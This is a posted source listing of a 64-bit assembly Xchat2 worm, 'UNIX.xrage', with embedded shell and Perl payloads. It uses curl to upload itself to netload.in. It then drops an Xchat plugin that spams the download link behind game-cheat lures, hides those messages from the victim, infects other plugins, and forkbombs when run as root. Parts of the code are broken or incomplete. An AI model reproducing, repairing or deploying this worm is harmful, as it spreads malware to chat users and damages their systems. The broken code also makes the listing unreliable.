[+]Topic: Code
[+]By: R3s1stanc3
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This is the 64 bit "translated" version of UNIX.xrage.ASM by R3s1stanc3
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; UNIX.xrage 64bit Xchat2 worm
; This is my first creation in nASM which uses still some dirty hacks
; but with time there comes more skill ;)
; UNIX.xrage checks if xchat2 and curl is installed. Then it drops a
; Bash script which uploads the worm to netload.in
; Now a Perl Plugin is droped to the autoload directory of xchat2. This
; Plugin now sends every 5 Minutes a random Message with the netload.in
; link to the channel. The victim can't see that he is spreading links
; because the plugin uses some Xchat2 API Foo :D
; The Plugin checks for other perl plugins in the autoload directory and
; infects them.
; If the virus is executed as root, the payload is an oldschool forkbomb
; You should rly check out the Xchat2 API. It's a heaven for VX :D
; Greetings to: SPTH, WarGame, alcopaul,herm1t, zer0p, R3s1stanc3, skier
; Greetings to: All the dudes from #virus and #vxnet <3
; Coded by Perforin [vxnetw0rk]
; "Translated" by R3s1stanc3 [vxnetw0rk]
section .data
%defstr home %!HOME ; $ENV{'HOME'}
%defstr home_env HOME=%!HOME ; HOME=$ENV{'HOME'}
HOME: db home,0 ; Store $ENV{'HOME'}
HOME_ENV: db home_env,0 ; Store HOME=$ENV{'HOME'}
shell: db "/bin/sh",0 ; our path the the shell
argv: dd shell, script2name, 0 ; argument array for sys_execv
endv: dd HOME_ENV,0 ; environment array for sys_execv
xchat: db "/usr/bin/xchat",0 ; path to xchat
curl: db "/usr/bin/curl",0 ; path to curl
; This is the bash script which will upload the virus to netload.in
script: db '#!/bin/sh',10,'AUTHCODE="jJk7pHDhVKIF2gZ6tRZ8VCpaTWCWaTra"',10
db 'SERVER=`curl -s http://api.netload.in/getserver.php`',10
db 'if [ "x$SERVER" = "x" ]; then',10,'exit 3',10,'fi',10
db 'PARAMETERS="-F auth=$AUTHCODE -F modus=file_upload"',10
db 'PARAMETERS="$PARAMETERS -F file_link=@$1"',10
db 'RESULT=`curl -s $PARAMETERS $SERVER`',10
db 'RESULT_CODE=`echo "$RESULT"|awk -F ',"';' '{print $1}'`",10
db 'RESULT_URL=`echo "$RESULT"|awk -F ',"';' '{print $4}'`",10
db 'if [ "x$RESULT_CODE" = "xprepare_failed" ]; then',10,'exit 6',10
db 'fi',10,'if [ "x$RESULT_CODE" = "xUPLOAD_OK" ]; then',10
db 'echo $RESULT_URL > $HOME/.xchat2/scrollback/url.txt',10,'fi',10
db 'exit 100',10
scriptLEN: equ $-script ; length of the script
scriptname: db 'netload.sh',0 ; captn obvious here
; This is the dirty-work-script. Copys the virus to its destination and destroys itself
script2: db '#!/bin/sh',10,"cp UNIX.xrage $HOME/.xchat2/scrollback/UNIX.xrage",10
db 'rm hackaround_UNIX.xrage.sh',10
script2LEN: equ $-script2 ; length of the script
script2name: db 'hackaround_UNIX.xrage.sh',0 ; captn obvious strikes again!
; This is the actual Xchat2 Perl Plugin which does the spreading
plugin: db '#!/usr/bin/perl',10,"$version = '0.1';",10
db 'Xchat::register("Xchat2 plugin manager", $version,"Responsible for',
db ' loading and initialising Xchat2 plugins");',10
db "$xchatdir_vir = Xchat::get_info('xchatdir');",10
db '$exec_vir = `sh $xchatdir_vir/scrollback/netload.sh $xchatdir_vir/scrollback/UNIX.xrage &`;',10
db '@sentences_vir = ("Hey look at this new cracked minecraft server!",',10
db ' "Newest AIMbot for counterstrike is out now! :D", "This tool is amazing!", "Ok I am honest.',10
db ' I got infected with UNIX.xrage by Perforin [vxnetw0rk]");',10,10
db "Xchat::hook_print('Your Message',\&hideme);",10,"Xchat::hook_timer(300000, \&spread);",10,10
db 'sub hideme {',10,'$msg = $_[0][1];',10,'return Xchat::EAT_XCHAT if $msg =~ /netload.in/i;',10,'}',10
db 'sub spread {',10,'open url, "<", "$xchatdir_vir/scrollback/url.txt" || die "Please reload Xchat!";',10
db 'chomp ($payload_url = );',10,'close url;',10,'$randomize_payload = $sentences_vir[int(rand(4))];',10
db 'Xchat::command("say $randomize_payload $payload_url");',10,'}',10,10
db '@modules_av = glob "$xchatdir_vir/*.pl";',10,'foreach $module_av (@modules_av) {',10
db 'open mod,"<", $module_av;',10,'while () {',10,'$infected = 1 and next if $_ =~ /^\# UNIX.xrage$/;',10
db '}',10,'push @not_infected, $module_av unless $infected;',10,'undef $infected;',10,'close mod;',10,'}',10
db 'foreach $not_infected_yet (@not_infected) {',10,'open mod, ">>", $not_infected_yet;',10
db "print mod 'Xchat::command(",'"load ',"' . $xchatdir_vir . '/xchat_PM.pl",'");',"';",10
db 'print mod "\# UNIX.xrage\n";',10,'close mod;',10,'}',10,'# UNIX.xrage',10
pluginLEN: equ $-plugin ; length of the script
pluginname: db 'xchat_PM.pl',0 ; some lame SE here PM stands for "Plugin Manager"
newname: db 'UNIX.xrage',0 ; part of the payload is that virus renames itself
root_payload: db "Forkbomb bitches! :)",10 ; Those who are dumb enough to start the virus as root
root_payloadLEN: equ $-root_payload ; will see this string
xchat_path: db '.xchat2/scrollback/',0 ; This is the directory which will store our virus
oneless: db '../',0 ; --> cd ..
section .text
global _start
mov rax, 2 ; sys_open
mov rdi, xchat ; opening xchat
mov rsi, 0 ; O_RDONLY
syscall ;
test rax, rax ; test if xchat exits
je Exit ; no? -> Exit
mov rax, 2 ; sys_open
mov rdi, curl ; opening curl
mov rsi, 0 ; O_RDONLY
syscall ;
test rax, rax ; test if curl exits
js Exit ; no? -> Exit
mov rax, 82 ; sys_rename
mov rdi, [rsp+8] ; get the filename of the stack!
mov rsi, newname
mov rax, 85 ; sys_creat
mov rdi, script2name ; drops script2
mov rsi, 00755Q ; -rwxr-xr-x in octal
syscall ; File descriptor in eax
test rax, rax ; Is the file descriptor valid?
js Exit ; No? Something went wrong!
mov rdi, rax ; move descriptor to rdi
mov rax, 1 ; sys_write
mov rsi, script2 ; content of script2
mov rdx, script2LEN ; length of script2
mov rax, 102 ; sys_getuid
cmp rax, 0 ; compare with 0 (0 == root)
je GotRoot ; jmp if rax is equal to 0
ja NotRoot ; jmp if rax is above 0
mov rax, 1 ; sys_write
mov rdi, 1 ; stdout
mov rsi, root_payload ; payload message
mov rdx, root_payloadLEN
mov rax, 57 ; sys_fork
syscall ;
jmp GotRoot ; loop
mov rax, 57 ; sys_fork
test rax, rax
jz Execute ; child executes script
mov rax, 80 ; sys_chdir
mov rdi, HOME
mov rax, 80 ; sys_chdir
mov rdi, xchat_path
mov rax, 85 ; sys_creat
mov rdi, scriptname ; drops script2
mov rsi, 00644Q ; -rw-r--r-- in octal
syscall ; File descriptor in eax
test rax, rax ; checking file descriptor...
js Exit ; something went wrong!
mov rdi, rax
mov rax, 1 ; sys_write
mov rsi, script2 ; script content
mov rdx, script2LEN ; length of the script content
mov rax, 80 ; sys_chdir
mov rdi, oneless ; cd ../
mov rax, 85 ; sys_creat
mov rdi, pluginname
mov rsi, 00644Q ; -rw-r--r-- in octal
test rax, rax ; checking file descriptor...
js Exit ; something went wrong!
mov rdi, rax
mov rax, 1 ; sys_write
mov rsi, script2 ; the actual xchat plugin drops now
mov rdx, script2LEN
jmp Exit
mov rax, 59 ; sys_execv
mov rdi, shell
mov rsi, argv ; execute dirty-work-script
mov rdx, endv
mov rax, 60 ; sys_exit
mov rdi, 0 ; return 0
syscall ;